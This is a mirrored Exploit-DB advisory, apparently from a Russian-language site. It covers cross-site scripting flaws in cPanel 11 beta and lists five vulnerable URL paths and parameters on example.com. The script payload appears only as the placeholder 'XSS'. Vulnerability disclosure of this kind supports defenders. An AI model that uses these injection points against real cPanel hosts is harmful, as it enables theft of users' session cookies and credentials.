- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29181
- Проверка EDB
-
- Пройдено
- Автор
- ARIA-SECURITY TEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2006-11-25
Код:
source: https://www.securityfocus.com/bid/21287/info
cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
cPanel version 11 beta is vulnerable; other versions may also be affected.
http://www.example.com/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
http://www.example.com/frontend/x/files/createdir.html?dir=XSS
http://www.example.com/frontend/x/err/erredit.html?dir=XSS
http://www.example.com/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS
http://www.example.com/frontend/x/files/createfile.html?dir=XSS
- Источник
- www.exploit-db.com